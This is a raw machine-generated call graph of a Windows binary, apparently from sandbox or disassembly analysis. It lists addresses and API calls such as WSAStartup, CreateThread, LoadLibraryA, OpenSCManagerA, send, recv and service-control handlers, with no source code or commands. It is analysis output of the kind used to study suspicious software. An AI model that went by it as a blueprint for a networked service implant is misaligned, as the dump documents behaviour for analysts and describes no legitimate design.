7ff7aabd6e9b 60572->60575 60573->60575 60574->60575 60575->60522 60577 7ff7aabd47c3 60576->60577 60596 7ff7aabd4809 60576->60596 60579 7ff7aabd4862 60577->60579 60580 7ff7aabd47cc 60577->60580 60600->60529 60845 7ffb22769f6c InitializeCriticalSectionAndSpinCount 60755->60845 60758 7ffb22761b96 60759 7ffb22761b9a 60758->60759 60914 7ffb2276296e WSAStartup 60758->60914 60759->60281 61072 7ffb2270427c InitializeCriticalSectionAndSpinCount 60768->61072 60776 7ffb227054c6 60782 7ffb227054ca 60776->60782 61141 7ffb227062ae WSAStartup 60776->61141 60782->60281 61288 7ffb23ab221c InitializeCriticalSectionAndSpinCount 60783->61288 60786 7ffb23ab90e6 60787 7ffb23ab90ea 60786->60787 61355 7ffb23ab328e WSAStartup 60786->61355 60787->60281 60792 7ffb23ab9131 60792->60787 61363 7ffb23ab3aa7 InitializeCriticalSectionAndSpinCount 60792->61363 61497 7ffb23b0794c InitializeCriticalSectionAndSpinCount 60794->61497 60797 7ffb23b08a79 60798 7ffb23b08a7d 60797->60798 61566 7ffb23b01fce WSAStartup 60797->61566 60801 7ffb23b077a2 6 API calls 60798->60801 60811 7ffb23b08a9a 60801->60811 60803 7ffb23b08aeb 60803->60798 61574 7ffb23b064f8 InitializeCriticalSectionAndSpinCount 60803->61574 60811->60281 61779 7ffb2273c9fc InitializeCriticalSectionAndSpinCount 60812->61779 60815 7ffb2273ff56 60828 7ffb2273ff5a 60815->60828 61848 7ffb22738b63 InitializeCriticalSectionAndSpinCount 60815->61848 60828->60281 62026 7ffb23ad14fc InitializeCriticalSectionAndSpinCount 60829->62026 60836 7ffb23ad12a6 60841 7ffb23ad12aa 60836->60841 62095 7ffb23ad4b5e WSAStartup 60836->62095 60837 7ffb23ad12f1 60837->60841 62103 7ffb23ad2b78 InitializeCriticalSectionAndSpinCount 60837->62103 60841->60281 60842->60280 60843->60281 60844->60281 60846 7ffb2276a0c0 GetLastError 60845->60846 60847 7ffb22769f9a 60845->60847 60848 7ffb22769dc2 12 API calls 60846->60848 60950 7ffb22764ac0 GetModuleHandleExA 60847->60950 60859 7ffb2276a099 60848->60859 60853 7ffb22769fd4 strlen 60855 7ffb22769fed 60853->60855 60856 7ffb2276a003 60853->60856 60854 7ffb22769dc2 12 API calls 60860 7ffb22761b92 60854->60860 60855->60856 60861 7ffb22769ff2 strlen 60855->60861 60857 7ffb2276a028 strlen fopen 60856->60857 60858 7ffb2276a008 strcat strlen 60856->60858 60862 7ffb2276a18d 60857->60862 60863 7ffb2276a077 60857->60863 60858->60857 60859->60854 60860->60758 60869 7ffb2276ad94 60860->60869 60861->60856 60865 7ffb22769dc2 12 API calls 60862->60865 60967 7ffb22769dc2 60863->60967 60865->60859 60870 7ffb2276adf9 60869->60870 60871 7ffb2276adb6 60869->60871 60872 7ffb22769dc2 12 API calls 60870->60872 60987 7ffb2276aa00 60871->60987 60874 7ffb22761bd1 60872->60874 60874->60759 60879 7ffb227644cc 60874->60879 60876 7ffb2276ae29 _errno _strtoui64 _errno 60876->60874 60877 7ffb2276ae5c _errno 60876->60877 60878 7ffb22769dc2 12 API calls 60877->60878 60878->60874 61029 7ffb22764df4 60879->61029 60915 7ffb227629b2 60914->60915 60916 7ffb2276298a 60914->60916 60918 7ffb22769dc2 12 API calls 60915->60918 60917 7ffb22769dc2 12 API calls 60916->60917 60920 7ffb22761be1 60917->60920 60919 7ffb227629cb 60918->60919 60921 7ffb22769dc2 12 API calls 60919->60921 60920->60759 60922 7ffb227617f8 InitializeCriticalSectionAndSpinCount 60920->60922 60921->60920 60923 7ffb2276189b GetLastError 60922->60923 60924 7ffb2276181d CreateThread 60922->60924 60927 7ffb22769dc2 12 API calls 60923->60927 60925 7ffb22761869 60924->60925 60926 7ffb22761973 GetLastError 60924->60926 60928 7ffb22761a6c 60925->60928 60929 7ffb22761876 60925->60929 60930 7ffb22769dc2 12 API calls 60926->60930 60927->60929 60932 7ffb22769dc2 12 API calls 60928->60932 60931 7ffb22769dc2 12 API calls 60929->60931 60930->60929 60951 7ffb22764af2 GetLastError 60950->60951 60952 7ffb22764ae8 60950->60952 60953 7ffb22769dc2 12 API calls 60951->60953 60954 7ffb227689db 60952->60954 60953->60952 60955 7ffb22768a22 60954->60955 60956 7ffb227689ec 60954->60956 60957 7ffb22769dc2 12 API calls 60955->60957 60958 7ffb227689f1 60956->60958 60959 7ffb22768a52 60956->60959 60965 7ffb22768a07 60957->60965 60961 7ffb22768a82 60958->60961 60962 7ffb227689fa 60958->60962 60960 7ffb22769dc2 12 API calls 60959->60960 60960->60965 60963 7ffb22769dc2 12 API calls 60961->60963 60978 7ffb2276889c 14 API calls 60962->60978 60963->60965 60965->60853 60965->60859 60966 7ffb227689ff 60966->60965 60968 7ffb22769dd0 60967->60968 60979 7ffb2276d580 60968->60979 60978->60966 60988 7ffb2276aa11 60987->60988 60989 7ffb2276aa49 60987->60989 60995 7ffb2276a6e9 60988->60995 60991 7ffb22769dc2 12 API calls 60989->60991 60993 7ffb2276aa28 60991->60993 60993->60874 60993->60876 60996 7ffb2276a701 60995->60996 60997 7ffb2276a71c 60995->60997 60998 7ffb2276a74f 60996->60998 60999 7ffb2276a706 60996->60999 61000 7ffb22769dc2 12 API calls 60997->61000 61002 7ffb22769dc2 12 API calls 60998->61002 61001 7ffb2276a782 60999->61001 61003 7ffb2276a70b 60999->61003 61004 7ffb2276a745 61000->61004 61005 7ffb22769dc2 12 API calls 61001->61005 61002->61004 61006 7ffb2276a7ec 61003->61006 61007 7ffb2276a7c1 strcmp 61003->61007 61010 7ffb22769dc2 12 API calls 61004->61010 61005->61004 61006->61004 61007->61003 61030 7ffb22764e02 LoadLibraryA 61029->61030 61031 7ffb22764e2b 61029->61031 61032 7ffb22764e2e GetLastError 61030->61032 61033 7ffb22764e10 61030->61033 61031->61032 61034 7ffb22769dc2 12 API calls 61032->61034 61035 7ffb22769dc2 12 API calls 61033->61035 61073 7ffb227042aa 61072->61073 61074 7ffb227043d0 GetLastError 61072->61074 61185 7ffb22702700 GetModuleHandleExA 61073->61185 61075 7ffb227040d2 6 API calls 61074->61075 61084 7ffb227043a9 61075->61084 61080 7ffb227042e4 strlen 61081 7ffb22704313 61080->61081 61082 7ffb227042fd 61080->61082 61087 7ffb22704338 strlen fopen 61081->61087 61088 7ffb22704318 strcat strlen 61081->61088 61082->61081 61085 7ffb22704302 strlen 61082->61085 61083 7ffb227040d2 6 API calls 61086 7ffb227043c6 61083->61086 61084->61083 61085->61081 61086->60776 61096 7ffb227051c4 61086->61096 61089 7ffb22704387 61087->61089 61090 7ffb2270449d 61087->61090 61088->61087 61091 7ffb227040d2 6 API calls 61089->61091 61092 7ffb227040d2 6 API calls 61090->61092 61093 7ffb227043a1 61091->61093 61092->61084 61093->61084 61094 7ffb2270450d 61093->61094 61097 7ffb22705229 61096->61097 61098 7ffb227051e6 61096->61098 61099 7ffb227040d2 6 API calls 61097->61099 61203 7ffb22704e30 61098->61203 61101 7ffb227051ff 61099->61101 61101->60782 61106 7ffb2270210c 61101->61106 61103 7ffb22705259 _errno _strtoui64 _errno 61103->61101 61104 7ffb2270528c _errno 61103->61104 61105 7ffb227040d2 6 API calls 61104->61105 61105->61101 61245 7ffb22702a34 61106->61245 61142 7ffb227062ca 61141->61142 61143 7ffb227062f2 61141->61143 61144 7ffb227040d2 6 API calls 61142->61144 61145 7ffb227040d2 6 API calls 61143->61145 61147 7ffb22705511 61144->61147 61146 7ffb2270630b 61145->61146 61148 7ffb227040d2 6 API calls 61146->61148 61147->60782 61149 7ffb22708f74 InitializeCriticalSectionAndSpinCount 61147->61149 61148->61147 61150 7ffb22708f8f 61149->61150 61151 7ffb22708fc4 GetLastError 61149->61151 61152 7ffb227040d2 6 API calls 61150->61152 61153 7ffb227040d2 6 API calls 61151->61153 61154 7ffb2270551a 61152->61154 61155 7ffb22708fe2 61153->61155 61154->60782 61186 7ffb22702728 61185->61186 61187 7ffb22702732 GetLastError 61185->61187 61189 7ffb2270ce6b 61186->61189 61188 7ffb227040d2 6 API calls 61187->61188 61188->61186 61190 7ffb2270ce7c 61189->61190 61191 7ffb2270ceb2 61189->61191 61192 7ffb2270ce81 61190->61192 61193 7ffb2270cee2 61190->61193 61194 7ffb227040d2 6 API calls 61191->61194 61196 7ffb2270cf12 61192->61196 61197 7ffb2270ce8a 61192->61197 61195 7ffb227040d2 6 API calls 61193->61195 61201 7ffb227042da 61194->61201 61195->61201 61198 7ffb227040d2 6 API calls 61196->61198 61202 7ffb2270cd2c 8 API calls 61197->61202 61198->61201 61200 7ffb2270ce8f 61200->61201 61201->61080 61201->61084 61202->61200 61204 7ffb22704e79 61203->61204 61205 7ffb22704e41 61203->61205 61206 7ffb227040d2 6 API calls 61204->61206 61211 7ffb22704b19 61205->61211 61209 7ffb22704e58 61206->61209 61209->61101 61209->61103 61212 7ffb22704b31 61211->61212 61213 7ffb22704b4c 61211->61213 61214 7ffb22704b36 61212->61214 61215 7ffb22704b7f 61212->61215 61216 7ffb227040d2 6 API calls 61213->61216 61217 7ffb22704bb2 61214->61217 61221 7ffb22704b3b 61214->61221 61218 7ffb227040d2 6 API calls 61215->61218 61220 7ffb22704b75 61216->61220 61219 7ffb227040d2 6 API calls 61217->61219 61218->61220 61219->61220 61226 7ffb227040d2 6 API calls 61220->61226 61222 7ffb22704c1c 61221->61222 61223 7ffb22704bf1 strcmp 61221->61223 61222->61220 61223->61221 61246 7ffb22702a42 LoadLibraryA 61245->61246 61247 7ffb22702a6b 61245->61247 61248 7ffb22702a50 61246->61248 61249 7ffb22702a6e GetLastError 61246->61249 61247->61249 61250 7ffb227040d2 6 API calls 61248->61250 61251 7ffb227040d2 6 API calls 61249->61251 61289 7ffb23ab224a 61288->61289 61290 7ffb23ab2370 GetLastError 61288->61290 61394 7ffb23ab4e20 GetModuleHandleExA 61289->61394 61291 7ffb23ab2072 6 API calls 61290->61291 61300 7ffb23ab2349 61291->61300 61296 7ffb23ab2284 strlen 61298 7ffb23ab22b3 61296->61298 61299 7ffb23ab229d 61296->61299 61297 7ffb23ab2072 6 API calls 61311 7ffb23ab2366 61297->61311 61302 7ffb23ab22d8 strlen fopen 61298->61302 61303 7ffb23ab22b8 strcat strlen 61298->61303 61299->61298 61301 7ffb23ab22a2 strlen 61299->61301 61300->61297 61301->61298 61304 7ffb23ab2327 61302->61304 61305 7ffb23ab243d 61302->61305 61303->61302 61306 7ffb23ab2072 6 API calls 61304->61306 61307 7ffb23ab2072 6 API calls 61305->61307 61308 7ffb23ab2341 61306->61308 61307->61300 61308->61300 61309 7ffb23ab24ad 61308->61309 61311->60786 61312 7ffb23ab1d84 61311->61312 61313 7ffb23ab1da6 61312->61313 61314 7ffb23ab1de9 61312->61314 61412 7ffb23ab19f0 61313->61412 61315 7ffb23ab2072 6 API calls 61314->61315 61317 7ffb23ab1dbf 61315->61317 61317->60787 61322 7ffb23ab482c 61317->61322 61319 7ffb23ab1e19 _errno _strtoui64 _errno 61319->61317 61320 7ffb23ab1e4c _errno 61319->61320 61321 7ffb23ab2072 6 API calls 61320->61321 61321->61317 61454 7ffb23ab5154 61322->61454 61356 7ffb23ab32aa 61355->61356 61357 7ffb23ab32d2 61355->61357 61359 7ffb23ab2072 6 API calls 61356->61359 61358 7ffb23ab2072 6 API calls 61357->61358 61360 7ffb23ab32eb 61358->61360 61361 7ffb23ab32c4 61359->61361 61362 7ffb23ab2072 6 API calls 61360->61362 61361->60792 61362->61361 61364 7ffb23ab3c52 GetLastError 61363->61364 61365 7ffb23ab3ad0 InitializeCriticalSectionAndSpinCount 61363->61365 61368 7ffb23ab2072 6 API calls 61364->61368 61366 7ffb23ab3afd 61365->61366 61367 7ffb23ab3d6e GetLastError 61365->61367 61395 7ffb23ab2266 61394->61395 61396 7ffb23ab4e52 GetLastError 61394->61396 61398 7ffb23ab859b 61395->61398 61397 7ffb23ab2072 6 API calls 61396->61397 61397->61395 61399 7ffb23ab85ac 61398->61399 61400 7ffb23ab85e2 61398->61400 61402 7ffb23ab8612 61399->61402 61403 7ffb23ab85b1 61399->61403 61401 7ffb23ab2072 6 API calls 61400->61401 61409 7ffb23ab227a 61401->61409 61404 7ffb23ab2072 6 API calls 61402->61404 61405 7ffb23ab85ba 61403->61405 61406 7ffb23ab8642 61403->61406 61404->61409 61411 7ffb23ab845c 8 API calls 61405->61411 61408 7ffb23ab2072 6 API calls 61406->61408 61408->61409 61409->61296 61409->61300 61410 7ffb23ab85bf 61410->61409 61411->61410 61413 7ffb23ab1a39 61412->61413 61414 7ffb23ab1a01 61412->61414 61415 7ffb23ab2072 6 API calls 61413->61415 61420 7ffb23ab16d9 61414->61420 61419 7ffb23ab1a18 61415->61419 61419->61317 61419->61319 61421 7ffb23ab170c 61420->61421 61422 7ffb23ab16f1 61420->61422 61423 7ffb23ab2072 6 API calls 61421->61423 61424 7ffb23ab16f6 61422->61424 61425 7ffb23ab173f 61422->61425 61431 7ffb23ab1735 61423->61431 61427 7ffb23ab1772 61424->61427 61429 7ffb23ab16fb 61424->61429 61426 7ffb23ab2072 6 API calls 61425->61426 61426->61431 61428 7ffb23ab2072 6 API calls 61427->61428 61428->61431 61430 7ffb23ab17dc 61429->61430 61432 7ffb23ab17b1 strcmp 61429->61432 61430->61431 61434 7ffb23ab2072 6 API calls 61431->61434 61432->61429 61455 7ffb23ab518b 61454->61455 61456 7ffb23ab5162 LoadLibraryA 61454->61456 61457 7ffb23ab518e GetLastError 61455->61457 61456->61457 61458 7ffb23ab5170 61456->61458 61460 7ffb23ab2072 6 API calls 61457->61460 61459 7ffb23ab2072 6 API calls 61458->61459 61461 7ffb23ab4840 61459->61461 61460->61461 61498 7ffb23b0797a 61497->61498 61499 7ffb23b07aa0 GetLastError 61497->61499 61501 7ffb23b07400 8 API calls 61498->61501 61500 7ffb23b077a2 6 API calls 61499->61500 61509 7ffb23b07a79 61500->61509 61502 7ffb23b07996 61501->61502 61615 7ffb23b05dcb 61502->61615 61505 7ffb23b079b4 strlen 61507 7ffb23b079e3 61505->61507 61508 7ffb23b079cd 61505->61508 61506 7ffb23b077a2 6 API calls 61510 7ffb23b07a96 61506->61510 61512 7ffb23b07a08 strlen fopen 61507->61512 61513 7ffb23b079e8 strcat strlen 61507->61513 61508->61507 61511 7ffb23b079d2 strlen 61508->61511 61509->61506 61510->60797 61521 7ffb23b08774 61510->61521 61511->61507 61514 7ffb23b07a57 61512->61514 61515 7ffb23b07b6d 61512->61515 61513->61512 61517 7ffb23b077a2 6 API calls 61514->61517 61516 7ffb23b077a2 6 API calls 61515->61516 61516->61509 61518 7ffb23b07a71 61517->61518 61518->61509 61519 7ffb23b07bdd 61518->61519 61522 7ffb23b08796 61521->61522 61523 7ffb23b087d9 61521->61523 61629 7ffb23b083e0 61522->61629 61525 7ffb23b077a2 6 API calls 61523->61525 61530 7ffb23b087af 61525->61530 61527 7ffb23b08809 _errno _strtoui64 _errno 61528 7ffb23b0883c _errno 61527->61528 61527->61530 61529 7ffb23b077a2 6 API calls 61528->61529 61529->61530 61530->60798 61531 7ffb23b06e0c 61530->61531 61671 7ffb23b07734 61531->61671 61567 7ffb23b01fea 61566->61567 61568 7ffb23b02012 61566->61568 61569 7ffb23b077a2 6 API calls 61567->61569 61570 7ffb23b077a2 6 API calls 61568->61570 61571 7ffb23b02004 61569->61571 61572 7ffb23b0202b 61570->61572 61571->60803 61573 7ffb23b077a2 6 API calls 61572->61573 61573->61571 61575 7ffb23b0651d CreateThread 61574->61575 61576 7ffb23b0659b GetLastError 61574->61576 61577 7ffb23b06673 GetLastError 61575->61577 61585 7ffb23b06569 61575->61585 61578 7ffb23b077a2 6 API calls 61576->61578 61581 7ffb23b077a2 6 API calls 61577->61581 61580 7ffb23b06576 61578->61580 61579 7ffb23b0676c 61581->61585 61585->61579 61585->61580 61616 7ffb23b05e12 61615->61616 61617 7ffb23b05ddc 61615->61617 61618 7ffb23b077a2 6 API calls 61616->61618 61619 7ffb23b05e42 61617->61619 61620 7ffb23b05de1 61617->61620 61627 7ffb23b05df7 61618->61627 61621 7ffb23b077a2 6 API calls 61619->61621 61622 7ffb23b05dea 61620->61622 61623 7ffb23b05e72 61620->61623 61621->61627 61628 7ffb23b05c8c 8 API calls 61622->61628 61624 7ffb23b077a2 6 API calls 61623->61624 61624->61627 61626 7ffb23b05def 61626->61627 61627->61505 61627->61509 61628->61626 61630 7ffb23b083f1 61629->61630 61631 7ffb23b08429 61629->61631 61637 7ffb23b080c9 61630->61637 61633 7ffb23b077a2 6 API calls 61631->61633 61634 7ffb23b08408 61633->61634 61634->61527 61634->61530 61638 7ffb23b080fc 61637->61638 61639 7ffb23b080e1 61637->61639 61642 7ffb23b077a2 6 API calls 61638->61642 61640 7ffb23b0812f 61639->61640 61641 7ffb23b080e6 61639->61641 61644 7ffb23b077a2 6 API calls 61640->61644 61643 7ffb23b08162 61641->61643 61650 7ffb23b080eb 61641->61650 61648 7ffb23b08125 61642->61648 61645 7ffb23b077a2 6 API calls 61643->61645 61644->61648 61645->61648 61646 7ffb23b081cc 61646->61648 61652 7ffb23b077a2 6 API calls 61648->61652 61649 7ffb23b081a1 strcmp 61649->61650 61650->61646 61650->61649 61672 7ffb23b07742 LoadLibraryA 61671->61672 61673 7ffb23b0776b 61671->61673 61674 7ffb23b07750 61672->61674 61675 7ffb23b0776e GetLastError 61672->61675 61673->61675 61676 7ffb23b077a2 6 API calls 61674->61676 61677 7ffb23b077a2 6 API calls 61675->61677 61780 7ffb2273cb50 GetLastError 61779->61780 61781 7ffb2273ca2a 61779->61781 61783 7ffb2273c852 6 API calls 61780->61783 61904 7ffb2273b930 GetModuleHandleExA 61781->61904 61788 7ffb2273cb29 61783->61788 61787 7ffb2273ca64 strlen 61789 7ffb2273ca7d 61787->61789 61790 7ffb2273ca93 61787->61790 61791 7ffb2273c852 6 API calls 61788->61791 61789->61790 61792 7ffb2273ca82 strlen 61789->61792 61793 7ffb2273cab8 strlen fopen 61790->61793 61794 7ffb2273ca98 strcat strlen 61790->61794 61802 7ffb2273cb46 61791->61802 61792->61790 61795 7ffb2273cc1d 61793->61795 61796 7ffb2273cb07 61793->61796 61794->61793 61797 7ffb2273c852 6 API calls 61795->61797 61921 7ffb2273c852 61796->61921 61797->61788 61802->60815 61803 7ffb2273d824 61802->61803 61804 7ffb2273d846 61803->61804 61805 7ffb2273d889 61803->61805 61941 7ffb2273d490 61804->61941 61806 7ffb2273c852 6 API calls 61805->61806 61808 7ffb2273d85f 61806->61808 61808->60828 61813 7ffb2273c25c 61808->61813 61810 7ffb2273d8b9 _errno _strtoui64 _errno 61810->61808 61811 7ffb2273d8ec _errno 61810->61811 61812 7ffb2273c852 6 API calls 61811->61812 61812->61808 61983 7ffb2273bc64 61813->61983 61849 7ffb22738b7e OpenSCManagerA 61848->61849 61850 7ffb22738be6 GetLastError 61848->61850 61851 7ffb22738cbe GetLastError 61849->61851 61852 7ffb22738bb4 61849->61852 61853 7ffb2273c852 6 API calls 61850->61853 61854 7ffb2273c852 6 API calls 61851->61854 61855 7ffb22738cda 61852->61855 61856 7ffb22738bc1 61852->61856 61853->61856 61854->61855 61857 7ffb2273c852 6 API calls 61855->61857 61858 7ffb2273c852 6 API calls 61856->61858 61859 7ffb22738bde 61857->61859 61858->61859 61859->60828 61860 7ffb2273b87e WSAStartup 61859->61860 61861 7ffb2273b8c2 61860->61861 61862 7ffb2273b89a 61860->61862 61864 7ffb2273c852 6 API calls 61861->61864 61863 7ffb2273c852 6 API calls 61862->61863 61905 7ffb2273b962 GetLastError 61904->61905 61906 7ffb2273b958 61904->61906 61907 7ffb2273c852 6 API calls 61905->61907 61908 7ffb2273466b 61906->61908 61907->61906 61909 7ffb2273467c 61908->61909 61910 7ffb227346b2 61908->61910 61912 7ffb22734681 61909->61912 61913 7ffb227346e2 61909->61913 61911 7ffb2273c852 6 API calls 61910->61911 61917 7ffb22734697 61911->61917 61915 7ffb22734712 61912->61915 61916 7ffb2273468a 61912->61916 61914 7ffb2273c852 6 API calls 61913->61914 61914->61917 61918 7ffb2273c852 6 API calls 61915->61918 61932 7ffb2273452c 8 API calls 61916->61932 61917->61787 61917->61788 61918->61917 61920 7ffb2273468f 61920->61917 61922 7ffb2273c860 61921->61922 61933 7ffb22740ac0 61922->61933 61932->61920 61942 7ffb2273d4a1 61941->61942 61943 7ffb2273d4d9 61941->61943 61949 7ffb2273d179 61942->61949 61945 7ffb2273c852 6 API calls 61943->61945 61948 7ffb2273d4b8 61945->61948 61948->61808 61948->61810 61950 7ffb2273d1ac 61949->61950 61951 7ffb2273d191 61949->61951 61954 7ffb2273c852 6 API calls 61950->61954 61952 7ffb2273d1df 61951->61952 61953 7ffb2273d196 61951->61953 61955 7ffb2273c852 6 API calls 61952->61955 61956 7ffb2273d212 61953->61956 61958 7ffb2273d19b 61953->61958 61959 7ffb2273d1d5 61954->61959 61955->61959 61957 7ffb2273c852 6 API calls 61956->61957 61957->61959 61960 7ffb2273d27c 61958->61960 61961 7ffb2273d251 strcmp 61958->61961 61963 7ffb2273c852 6 API calls 61959->61963 61960->61959 61962 7ffb2273d283 61960->61962 61961->61958 61965 7ffb2273d299 61963->61965 61965->61948 61984 7ffb2273bc9b 61983->61984 61985 7ffb2273bc72 LoadLibraryA 61983->61985 61986 7ffb2273bc9e GetLastError 61984->61986 61985->61986 61987 7ffb2273bc80 61985->61987 61989 7ffb2273c852 6 API calls 61986->61989 61988 7ffb2273c852 6 API calls 61987->61988 61990 7ffb2273bc99 61988->61990 61989->61990 62027 7ffb23ad152a 62026->62027 62028 7ffb23ad1650 GetLastError 62026->62028 62131 7ffb23ad3a80 GetModuleHandleExA 62027->62131 62029 7ffb23ad1352 27 API calls 62028->62029 62035 7ffb23ad1629 62029->62035 62034 7ffb23ad1564 strlen 62037 7ffb23ad1593 62034->62037 62038 7ffb23ad157d 62034->62038 62036 7ffb23ad1352 27 API calls 62035->62036 62039 7ffb23ad12a2 62036->62039 62041 7ffb23ad15b8 strlen fopen 62037->62041 62042 7ffb23ad1598 strcat strlen 62037->62042 62038->62037 62040 7ffb23ad1582 strlen 62038->62040 62039->60836 62050 7ffb23ad2324 62039->62050 62040->62037 62043 7ffb23ad1607 62041->62043 62044 7ffb23ad171d 62041->62044 62042->62041 62045 7ffb23ad1352 27 API calls 62043->62045 62046 7ffb23ad1352 27 API calls 62044->62046 62047 7ffb23ad1621 62045->62047 62046->62035 62047->62035 62048 7ffb23ad178d 62047->62048 62051 7ffb23ad2389 62050->62051 62052 7ffb23ad2346 62050->62052 62054 7ffb23ad1352 27 API calls 62051->62054 62149 7ffb23ad1f90 62052->62149 62059 7ffb23ad12e1 62054->62059 62056 7ffb23ad23b9 _errno _strtoui64 _errno 62057 7ffb23ad23ec _errno 62056->62057 62056->62059 62058 7ffb23ad1352 27 API calls 62057->62058 62058->62059 62059->60841 62060 7ffb23ad348c 62059->62060 62191 7ffb23ad3db4 62060->62191 62096 7ffb23ad4b7a 62095->62096 62097 7ffb23ad4ba2 62095->62097 62098 7ffb23ad1352 27 API calls 62096->62098 62099 7ffb23ad1352 27 API calls 62097->62099 62100 7ffb23ad4b94 62098->62100 62101 7ffb23ad4bbb 62099->62101 62100->60837 62102 7ffb23ad1352 27 API calls 62101->62102 62102->62100 62104 7ffb23ad2c1b GetLastError 62103->62104 62105 7ffb23ad2b9d CreateThread 62103->62105 62108 7ffb23ad1352 27 API calls 62104->62108 62106 7ffb23ad2be9 62105->62106 62107 7ffb23ad2cf3 GetLastError 62105->62107 62109 7ffb23ad2dec 62106->62109 62113 7ffb23ad2bf6 62106->62113 62110 7ffb23ad1352 27 API calls 62107->62110 62108->62113 62110->62113 62132 7ffb23ad1546 62131->62132 62133 7ffb23ad3ab2 GetLastError 62131->62133 62135 7ffb23ad7feb 62132->62135 62134 7ffb23ad1352 27 API calls 62133->62134 62134->62132 62136 7ffb23ad8032 62135->62136 62137 7ffb23ad7ffc 62135->62137 62140 7ffb23ad1352 27 API calls 62136->62140 62138 7ffb23ad8001 62137->62138 62139 7ffb23ad8062 62137->62139 62141 7ffb23ad800a 62138->62141 62142 7ffb23ad8092 62138->62142 62143 7ffb23ad1352 27 API calls 62139->62143 62146 7ffb23ad155a 62140->62146 62148 7ffb23ad7eac 29 API calls 62141->62148 62144 7ffb23ad1352 27 API calls 62142->62144 62143->62146 62144->62146 62146->62034 62146->62035 62147 7ffb23ad800f 62147->62146 62148->62147 62150 7ffb23ad1fd9 62149->62150 62151 7ffb23ad1fa1 62149->62151 62153 7ffb23ad1352 27 API calls 62150->62153 62157 7ffb23ad1c79 62151->62157 62155 7ffb23ad1fb8 62153->62155 62155->62056 62155->62059 62158 7ffb23ad1c91 62157->62158 62159 7ffb23ad1cac 62157->62159 62160 7ffb23ad1c96 62158->62160 62161 7ffb23ad1cdf 62158->62161 62162 7ffb23ad1352 27 API calls 62159->62162 62164 7ffb23ad1d12 62160->62164 62166 7ffb23ad1c9b 62160->62166 62163 7ffb23ad1352 27 API calls 62161->62163 62168 7ffb23ad1cd5 62162->62168 62163->62168 62165 7ffb23ad1352 27 API calls 62164->62165 62165->62168 62167 7ffb23ad1d7c 62166->62167 62169 7ffb23ad1d51 strcmp 62166->62169 62167->62168 62171 7ffb23ad1352 27 API calls 62168->62171 62169->62166 62192 7ffb23ad3dc2 LoadLibraryA 62191->62192 62193 7ffb23ad3deb 62191->62193 62194 7ffb23ad3dd0 62192->62194 62195 7ffb23ad3dee GetLastError 62192->62195 62193->62195 62196 7ffb23ad1352 27 API calls 62194->62196 62197 7ffb23ad1352 27 API calls 62195->62197 62235 7ff7aabdaa85 62234->62235 62236 7ff7aabdaa6e 62234->62236 62241 7ff7aabdbac0 fputc 62235->62241 62240 7ff7aabdbac0 fputc 62236->62240 62239 7ff7aabd2f59 62239->60316 62239->60317 62239->60319 62240->62239 62241->62239 62242 7ffb23ab378b 62243 7ffb23ab379d 62242->62243 62244 7ffb23ab3919 62243->62244 62246 7ffb23ab37de Sleep SleepEx 62243->62246 62247 7ffb23ab3862 GetProcessHeap HeapAlloc 62243->62247 62255 7ffb23ab2eca 62243->62255 62246->62243 62248 7ffb23ab3889 memcpy 62247->62248 62252 7ffb23ab37fb 62247->62252 62250 7ffb23ab2072 6 API calls 62248->62250 62249 7ffb23ab2072 6 API calls 62249->62252 62251 7ffb23ab38e9 EnterCriticalSection 62250->62251 62251->62252 62252->62243 62252->62249 62252->62252 62253 7ffb23ab3837 memcpy 62252->62253 62254 7ffb23ab3821 LeaveCriticalSection 62252->62254 62253->62243 62254->62252 62256 7ffb23ab2ee4 62255->62256 62257 7ffb23ab2f58 62255->62257 62256->62257 62259 7ffb23ab2ee9 recv 62256->62259 62258 7ffb23ab2072 6 API calls 62257->62258 62260 7ffb23ab2f03 62258->62260 62261 7ffb23ab2f0c WSAGetLastError 62259->62261 62262 7ffb23ab2eff 62259->62262 62260->62243 62261->62260 62263 7ffb23ab2f20 62261->62263 62262->62260 62265 7ffb23ab2072 6 API calls 62262->62265 62264 7ffb23ab2072 6 API calls 62263->62264 62264->62260 62265->62260 62266 7ffb23ab33cf 62267 7ffb23ab33fa LeaveCriticalSection 62266->62267 62268 7ffb23ab33d7 62266->62268 62277 7ffb23ab3388 62267->62277 62268->62266 62283 7ffb23ab2f7d 62268->62283 62270 7ffb23ab340c GetProcessHeap HeapFree 62270->62277 62271 7ffb23ab34eb Sleep SleepEx 62272 7ffb23ab34fb EnterCriticalSection 62271->62272 62274 7ffb23ab3508 62272->62274 62273 7ffb23ab343a EnterCriticalSection 62275 7ffb23ab345d LeaveCriticalSection 62273->62275 62273->62277 62276 7ffb23ab3539 LeaveCriticalSection 62274->62276 62279 7ffb23ab3520 GetProcessHeap HeapFree 62274->62279 62275->62277 62277->62270 62277->62271 62277->62272 62277->62273 62277->62275 62278 7ffb23ab347c 62277->62278 62282 7ffb23ab89d5 GetSystemTimeAsFileTime 62277->62282 62280 7ffb23ab2072 6 API calls 62278->62280 62279->62274 62281 7ffb23ab34ca EnterCriticalSection 62280->62281 62282->62277 62284 7ffb23ab2fa8 62283->62284 62285 7ffb23ab302c 62283->62285 62284->62285 62286 7ffb23ab2fad 62284->62286 62287 7ffb23ab2072 6 API calls 62285->62287 62289 7ffb23ab2fb6 send 62286->62289 62290 7ffb23ab2ff9 62286->62290 62288 7ffb23ab3000 62287->62288 62288->62268 62289->62286 62291 7ffb23ab2fda WSAGetLastError 62289->62291 62290->62288 62293 7ffb23ab2072 6 API calls 62290->62293 62292 7ffb23ab2072 6 API calls 62291->62292 62292->62290 62293->62288 62294 7ff7aabd1b75 62295 7ff7aabd161a 116 API calls 62294->62295 62296 7ff7aabd1b7f 62295->62296 62297 7ff7aabd1be4 RegisterServiceCtrlHandlerA 62296->62297 62320 7ff7aabd1b85 62296->62320 62298 7ff7aabd1c04 62297->62298 62299 7ff7aabd1c25 GetLastError 62297->62299 62324 7ff7aabd1360 SetServiceStatus 62298->62324 62303 7ff7aabd2ef2 6 API calls 62299->62303 62302 7ff7aabd1bac 62327 7ff7aabd1a63 10 API calls 62302->62327 62303->62320 62304 7ff7aabd1d18 62308 7ff7aabd2ef2 6 API calls 62304->62308 62305 7ff7aabd1c19 62309 7ff7aabd16e3 398 API calls 62305->62309 62318 7ff7aabd1d32 62308->62318 62309->62320 62310 7ff7aabd1bb1 62328 7ff7aabd1b1c 13 API calls 62310->62328 62312 7ff7aabd1bb6 62313 7ff7aabd1dad ExitProcess 62312->62313 62314 7ff7aabd1bbe 62312->62314 62316 7ff7aabd1bdd 62314->62316 62329 7ff7aabd1360 SetServiceStatus 62314->62329 62315 7ff7aabd1d48 62319 7ff7aabd2ef2 6 API calls 62315->62319 